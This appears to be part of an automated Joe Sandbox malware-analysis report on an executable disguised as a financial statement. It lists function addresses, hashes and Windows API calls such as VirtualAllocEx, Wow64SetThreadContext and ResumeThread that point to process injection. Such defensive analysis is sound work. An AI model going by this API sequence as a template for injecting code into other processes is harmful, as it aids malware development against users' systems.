Instruction Fuzzy Hash: 622157B19002099FDB10DFAAC4847EEBBF0EB88320F10842AD559A7240C778A945CFA1

Function 04B99780 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04B99800

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ae6dc328a782370a331dcafabf93e82bff2678bec7b1f0638d48438696f2db6d
Instruction ID: 8d9ee14c379df2cc00110b847e433678b87dfd43df6f0c53c4b50c134d80500a
Opcode Fuzzy Hash: ae6dc328a782370a331dcafabf93e82bff2678bec7b1f0638d48438696f2db6d
Instruction Fuzzy Hash: CE2116B18002599FDB10DFAAC881ADEBBF5FF48320F10842DE559A7250C778A944CBA5

Function 04B990F8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04B99176

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3ed6859c1c6e3b85ff650920c385b90ad80b46834805f043c08f55eb1eb1a10d
Instruction ID: 11435b75f830557b364e56156257b36228862359853f5b30a3dd9b43070025e3
Opcode Fuzzy Hash: 3ed6859c1c6e3b85ff650920c385b90ad80b46834805f043c08f55eb1eb1a10d
Instruction Fuzzy Hash: 922137B19002199FDB10DFAAC4857EEBBF4EB88324F14842AD559A7240C778A945CFA5

Function 04B991CA Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04B9923E

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 63c5d2c365635bc297a54ff229bbbdb410518a870b28f40b76fbaba540fe568e
Instruction ID: 9ffcb482bb4c06a87dd0ad743f03552d73b693d3a140a4fa651312690dfa20c9
Opcode Fuzzy Hash: 63c5d2c365635bc297a54ff229bbbdb410518a870b28f40b76fbaba540fe568e
Instruction Fuzzy Hash: 3C1156B29002489FCF10DFA9C844BDEBFF5EF88320F208429E519A7250C735A944CFA1

Function 04B991D0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04B9923E

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d06f0ddc0463d4d3f559ed572cf894cc0b0e553bf7ff4f399c6e559bae5cd757
Instruction ID: f30a43558e1a6bf0662da14d54355f01c28a5244e0c3dcf390dc6a50d458b72d
Opcode Fuzzy Hash: d06f0ddc0463d4d3f559ed572cf894cc0b0e553bf7ff4f399c6e559bae5cd757
Instruction Fuzzy Hash: FE1156B28002488FCF10DFAAC844ADEBFF5EF88320F208429E519A7250C735A944CFA1

Function 04B99042 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04B990AA

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d20b90d9d1da58f6cc47230aea6b062a7a1f4869fe70ef646e164775ff53c410
Instruction ID: e612ac77706afcfeb6007274736a2951f1ffcc621d31821ae2deca742d369df1
Opcode Fuzzy Hash: d20b90d9d1da58f6cc47230aea6b062a7a1f4869fe70ef646e164775ff53c410
Instruction Fuzzy Hash: 531166B1D002488FCB20DFAAC4447DEFFF4EB88324F20842AD529A7250CB39A944CF94

Function 04B99048 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04B990AA

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b235bb4ed5059b4606879598358a66f5ef2b3a162569f85722379524a0908460
Instruction ID: 36fe1c1a1e6470c2f89afb6b1fcb79d3a8868c5db6cba69a34218ecc5fce14d0
Opcode Fuzzy Hash: b235bb4ed5059b4606879598358a66f5ef2b3a162569f85722379524a0908460
Instruction Fuzzy Hash: 5C1136B19002488FDB20DFAAC4457DEFBF4EB88324F24842AD559A7250CB79A944CFA5

Function 0098B2D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0098B33E

Memory Dump Source

Source File: 00000000.00000002.1654575320.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5c2f29a20e0828429b01ae372b50260fcd6c80af11a2a62da9b6abb3f7c21431
Instruction ID: 9b4a294851ccf6bd32776879d23cf90a73cf71be976816951919620002898498
Opcode Fuzzy Hash: 5c2f29a20e0828429b01ae372b50260fcd6c80af11a2a62da9b6abb3f7c21431
Instruction Fuzzy Hash: B61110B6C003498FCB20DF9AC444ADEFBF8AB88324F14842AD419A7310C379A545CFA1

Function 008DD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654243497.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8dd000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac5215b79b75e45b70e5410f741187af25fe5180e0a1f2b60d13f9644789811d
Instruction ID: 3d39af11fc44a7f622b61802d9e0367a0d5463a933f87e96d4f424383ec8872d
Opcode Fuzzy Hash: ac5215b79b75e45b70e5410f741187af25fe5180e0a1f2b60d13f9644789811d
Instruction Fuzzy Hash: 8721F171540344DFCB05DF14E980B26BF75FB98318F20C66AE8098A356C336D856CAA1

Function 008ED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654294107.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ed000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e786e0b96b3bcdefb41e36a9f8e086f1dffcd74e28347fc6399ece7ccd87c35f
Instruction ID: 4c545bed4f601ea1d26976df8b51f70235ccc3f4dad90b1a8b88dad84f2419e1
Opcode Fuzzy Hash: e786e0b96b3bcdefb41e36a9f8e086f1dffcd74e28347fc6399ece7ccd87c35f
Instruction Fuzzy Hash: DA21F271604784DFCB14DF15D984B26BBA5FB85318F28C569D80A8B296C33AD84BCA61

Function 008ED006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654294107.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ed000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 800ac14a21edcc82eddb32aa5a2f8d9aaec8509955ac67b1f4cae810dea4b44a
Instruction ID: dba6c656d7d51d0370f94f229fc2b313db7e77eba9317e2d61f349a6ebd86e97
Opcode Fuzzy Hash: 800ac14a21edcc82eddb32aa5a2f8d9aaec8509955ac67b1f4cae810dea4b44a
Instruction Fuzzy Hash: 49214F755087809FCB02CF14D994711BF71FB56314F28C5EAD8498F2A6C33A985ACB62

Function 008DD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654243497.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8dd000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 1dd1bf3cd830e8f5f6a4671b471840034b495ea0f507ff4aa18e8b933a9e8956
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 5111B176504380DFCB16CF14D5C4B16BF71FB94328F24C6AAD8494B656C336D85ACBA1

Non-executed Functions

Function 04B90040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c77da9235e44b6adf2752f2ff5fb57c08ba60461102f8908baf2fb4e01e2b4c8
Instruction ID: f61796041ae64dc0741db19be8ac9b77d21e87caea07ff7d63e8d5faddd1baeb
Opcode Fuzzy Hash: c77da9235e44b6adf2752f2ff5fb57c08ba60461102f8908baf2fb4e01e2b4c8
Instruction Fuzzy Hash: 0A12A5B0401F468AD712CF65FD4C1893BB1BB81318B90432AD265AB7F9D7B8154ACFA4

Function 0098DED4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654575320.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3043e2636e09aba21f3e3111bc7b8c59550d9822f82bcbfa531be40ae2a32b41
Instruction ID: fe5911c56ac2056a68736f57ca59af3d24020950101aeb15433b9091ca0bf4e6
Opcode Fuzzy Hash: 3043e2636e09aba21f3e3111bc7b8c59550d9822f82bcbfa531be40ae2a32b41
Instruction Fuzzy Hash: D1A17F32E102098FCF05EFB5D8509AEB7B6FF84300B15857AE906AB3A5DB31D945CB90

Function 04B90006 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656614136.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b90000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c810faac26bc4b049e87e0208c84baf442b23d866370c2099e5bce54a8053288
Instruction ID: f03323136e44f18cd779410647230789ce66b6536dc17d1feaab91d7b600d7d8
Opcode Fuzzy Hash: c810faac26bc4b049e87e0208c84baf442b23d866370c2099e5bce54a8053288
Instruction Fuzzy Hash: B4C1F9B0801B468BD712CF65FC481897BB1BB85318F55432BD261AB3F9DBB8154ACF64

Analysis Process: Statement JULY #U007e SEP 2024 USD 19,055.00.exePID: 7568, Parent PID: 7524COMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	168
Total number of Limit Nodes:	18

Executed Functions

Function 06B43018 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06B4374C
$^q, xrefs: 06B43764
$^q, xrefs: 06B43723
$^q, xrefs: 06B43770
$^q, xrefs: 06B43740
$^q, xrefs: 06B43717

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: d8587e73eaa38775faeb24de94c68bd0cb1362a2e7d2a68658caefc0f178e158
Instruction ID: 43157a513587abba5a010c0d328fb6204e7cd4673bc95682255a96661c857aa2
Opcode Fuzzy Hash: d8587e73eaa38775faeb24de94c68bd0cb1362a2e7d2a68658caefc0f178e158
Instruction Fuzzy Hash: 32322F31E1061ACFDB14EF75C85499DB7F6FF89300F1486A9D449AB264EB30D985CB81

Function 06B478F8 Relevance: 3.0, Strings: 2, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06B47C35
$^q, xrefs: 06B47C41

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: e327418e8edc04aa6be7aaa7e314333328a015a4be05c6677cc1239b1ad5cbe0
Instruction ID: b5cacdf71052e9978992ed2e22b644ff94f86265707179767493740e8f7a5b64
Opcode Fuzzy Hash: e327418e8edc04aa6be7aaa7e314333328a015a4be05c6677cc1239b1ad5cbe0
Instruction Fuzzy Hash: F1029D70B102169FDB54EF68D490AAEB7E2FF84204F1485B9D40AAB395DF35EC42CB91

Function 06B42340 Relevance: 1.0, Instructions: 1010COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13656e1ee81d1ec1028b179bd441428162d34443f2c5f9c00bd5b6f7a3a8a4e0
Instruction ID: 40aa4dbecd3e039926e9a60100256d456de4a52d76c2e735c5f614383baf6083
Opcode Fuzzy Hash: 13656e1ee81d1ec1028b179bd441428162d34443f2c5f9c00bd5b6f7a3a8a4e0
Instruction Fuzzy Hash: 27927774A00204CFDB64EB68C184A5DBBF2FF45314F5494A9E849AB361DB35ED86EB80

Function 06B46160 Relevance: .8, Instructions: 823COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c11f1ecb524ad27b3ef376aa9473214756e7c96d9add1d33c299ac37caf610
Instruction ID: 103adef6b2304c88438682fe0775073ab9b571398f90068c6d52725a5d972b5e
Opcode Fuzzy Hash: d8c11f1ecb524ad27b3ef376aa9473214756e7c96d9add1d33c299ac37caf610
Instruction Fuzzy Hash: CD62BF70B002058FDB54EB68D594BADB7F2EF85314F1494A9E40AEB361EB35EC46DB80

Function 06B4C0F8 Relevance: .6, Instructions: 649COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7292f0ee8fbc2ccf359bc70f36bc62d29b7057b7854e7d1c0c5b87ded25cea
Instruction ID: 5b7a75b1b916d94e09a7d5d4bfc65b75c999d67ddf45ffb64de1ad5580cb3ee5
Opcode Fuzzy Hash: 1b7292f0ee8fbc2ccf359bc70f36bc62d29b7057b7854e7d1c0c5b87ded25cea
Instruction Fuzzy Hash: 7232DE74B012099FDB54EF68D890BAEBBB2FB88710F109465D405EB365DB34EC42DB91

Function 06B45150 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cc0645e050c76ab044f9ea315980c4252acf71f2ef7ab163395f1afbba9bcb1
Instruction ID: 6509eeeb3ea46d357f51c2405cc0fa0dee312387ba2c17c5c92296a71c515601
Opcode Fuzzy Hash: 9cc0645e050c76ab044f9ea315980c4252acf71f2ef7ab163395f1afbba9bcb1
Instruction Fuzzy Hash: E6121472F006159FDB70EF64C8907AEB7B2EB85310F1084AAD84ADB345DA34EC46DB91

Function 06B4AD90 Relevance: .6, Instructions: 570COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ec036fa8b96eb6181710a2754d0a3bcd4dd0d447d6550cb57149f554e45a9b0
Instruction ID: 33677839f8689025fd2611028e593c09754c9dcd1c2affebbe787548fdfff138
Opcode Fuzzy Hash: 4ec036fa8b96eb6181710a2754d0a3bcd4dd0d447d6550cb57149f554e45a9b0
Instruction Fuzzy Hash: 0122B6B0E101099FDF64EB68C4907AEB7B1FB85310F209866E519EB355CB35DC82DB51

Function 06B4A838 Relevance: 10.4, Strings: 8, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06B4A9E7
$^q, xrefs: 06B4A9B8
$^q, xrefs: 06B4A9AC
$^q, xrefs: 06B4A965
$^q, xrefs: 06B4AA04
$^q, xrefs: 06B4A959
$^q, xrefs: 06B4AA10
$^q, xrefs: 06B4A9DB

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 261f5f9b37f2ecf102a7e154d29dd1de6e693a17d9c61e4721c7f8117778565a
Instruction ID: ee028b97cbc004f86578ccaf7ced90867d3fc231b61b20d48cc8ea0ed339427d
Opcode Fuzzy Hash: 261f5f9b37f2ecf102a7e154d29dd1de6e693a17d9c61e4721c7f8117778565a
Instruction Fuzzy Hash: 40E1AF70F5020A8FDB59EF68D5806AEB7B2FF85300F108569D409AB359EB35DC46DB81

Function 06AE6B19 Relevance: 6.1, APIs: 4, Instructions: 137
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06AE6BA6
GetCurrentThread.KERNEL32 ref: 06AE6BE3
GetCurrentProcess.KERNEL32 ref: 06AE6C20
GetCurrentThreadId.KERNEL32 ref: 06AE6C79

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a2800117e0e96495506e5d29c359d69075fc62d2c6b7a22a194b77c481c981a8
Instruction ID: 51d0aaaa28828444e1fb88eb3a8aa6229753d92fcf6cad1b60d45df7b4064e36
Opcode Fuzzy Hash: a2800117e0e96495506e5d29c359d69075fc62d2c6b7a22a194b77c481c981a8
Instruction Fuzzy Hash: BE5157B0D00649CFDB54EFAAD948BDEBBF1EB88304F208459E119A7261D734A944CF66

Function 06AE6B28 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06AE6BA6
GetCurrentThread.KERNEL32 ref: 06AE6BE3
GetCurrentProcess.KERNEL32 ref: 06AE6C20
GetCurrentThreadId.KERNEL32 ref: 06AE6C79

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 09a31fd8401986d342e6392b07bc98b750c652afd2b5f16f6712d34050245f8c
Instruction ID: d6ec4a418b4600540c655a173ae24c32d0bcdb8f15e72e198195be9a78ede530
Opcode Fuzzy Hash: 09a31fd8401986d342e6392b07bc98b750c652afd2b5f16f6712d34050245f8c
Instruction Fuzzy Hash: 355148B0D00209CFDB54EFA9D948BDEFBF1EB88304F208459E519A7260D734A944CF65

Function 06B48CC8 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06B48D1B
$^q, xrefs: 06B48D56
$^q, xrefs: 06B48D4A
$^q, xrefs: 06B48D0F

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: acd324f607ba2876fb0a7672f73cfa8a30e54e186d2569fbb006e29cb5de4438
Instruction ID: db8492164aa84dab022285fa4855b27d7739f18c379cb9ad348480fb4f3cb4f8
Opcode Fuzzy Hash: acd324f607ba2876fb0a7672f73cfa8a30e54e186d2569fbb006e29cb5de4438
Instruction Fuzzy Hash: AC912E70B0021A9FDB54EF65D9507AEB3F6EFC9204F108569C409EB354EB74EC468B91

Function 06B4CEC8 Relevance: 4.6, Strings: 3, Instructions: 804
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06B4D2D3
$^q, xrefs: 06B4D2C7
$^q, xrefs: 06B4D2BF

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 577f4df4781697266b47d18653d30b60f152614db0ee60ad5dc6dd1c776cf0d3
Instruction ID: 77b08350b098637c5c924910fbbaec2da51aa177d0d0d70665f090868d8b3769
Opcode Fuzzy Hash: 577f4df4781697266b47d18653d30b60f152614db0ee60ad5dc6dd1c776cf0d3
Instruction Fuzzy Hash: 35625270A4020A9FCB55EF68D590A5EB7F2FF84304F208969D4099F369EB75EC46CB80

Function 06B44718 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Ocq, xrefs: 06B448CF
XPcq, xrefs: 06B44845
fcq, xrefs: 06B44E25

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 09fe4b5636817b4ec23e35aceec025db83cde99329a1cf91e92893ed6cef8d06
Instruction ID: 21509f3aaebb596659de01990f54c4fd10cd8bbef339ecfb0a7017d133009f57
Opcode Fuzzy Hash: 09fe4b5636817b4ec23e35aceec025db83cde99329a1cf91e92893ed6cef8d06
Instruction Fuzzy Hash: 80618F70F002199FEB54AFA4C8547AEBBF6FB88700F208469D106AB395DB758C469B91

Function 015E86F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 015E86C0

Strings

LR^q, xrefs: 015E871C

Memory Dump Source

Source File: 00000003.00000002.4105656009.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15e0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: FileMove
String ID: LR^q
API String ID: 3562171763-2625958711
Opcode ID: fde2412daf250eeeb4b3057235a4a700c26d38f5b3aca05244ecec9c4648a876
Instruction ID: 2f9d96350c2ab558272a045f94bb30fec0da7afb9a5fef42d7f779040e79c3d9
Opcode Fuzzy Hash: fde2412daf250eeeb4b3057235a4a700c26d38f5b3aca05244ecec9c4648a876
Instruction Fuzzy Hash: 87418B70E102099FDF19DFA9C84879EBBF2FB86304F248829E905EB280D7759846CB51

Function 06B48CB7 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06B48D4A
$^q, xrefs: 06B48D0F

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 31254f6eb9844a829fb73970872ca459e7348a6f52414c6e0650b4c5a4e39a39
Instruction ID: d0fae6b0dbe1e677ec98f2e00d3002783fa4e153e99b2ff967943c3dcfe1bc12
Opcode Fuzzy Hash: 31254f6eb9844a829fb73970872ca459e7348a6f52414c6e0650b4c5a4e39a39
Instruction Fuzzy Hash: 02512D70B00119AFDB54EF65D990A6EB3F6EFC8604F10846AC909EB354EB34EC428B95

Function 06AE328D Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AE33AA

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a1856c7f4f7a379c5e0eae127002130f30bb41e69edc3dc9e41f57f8d3183729
Instruction ID: e1374ccac2dfa5b18cf8979e10542ccd965b112c6a23f7c20b19b2c383031c5f
Opcode Fuzzy Hash: a1856c7f4f7a379c5e0eae127002130f30bb41e69edc3dc9e41f57f8d3183729
Instruction Fuzzy Hash: F751CFB1D00309AFDF14DF9AC984ADEFBB5BF48310F24812AE419AB210D775A885CF91

Function 06AE3298 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06AE33AA

Memory Dump Source

Source File: 00000003.00000002.4117744742.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ae0000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 786c1a32c1355f4a0e25465ad2c334c7a37ef014b5496d7b34b9fb72fdb64af9
Instruction ID: dfd690e3d33a53e3850edd1b67eb2117b9fa1a6d2ce46d62ecec33e62c97fcbe
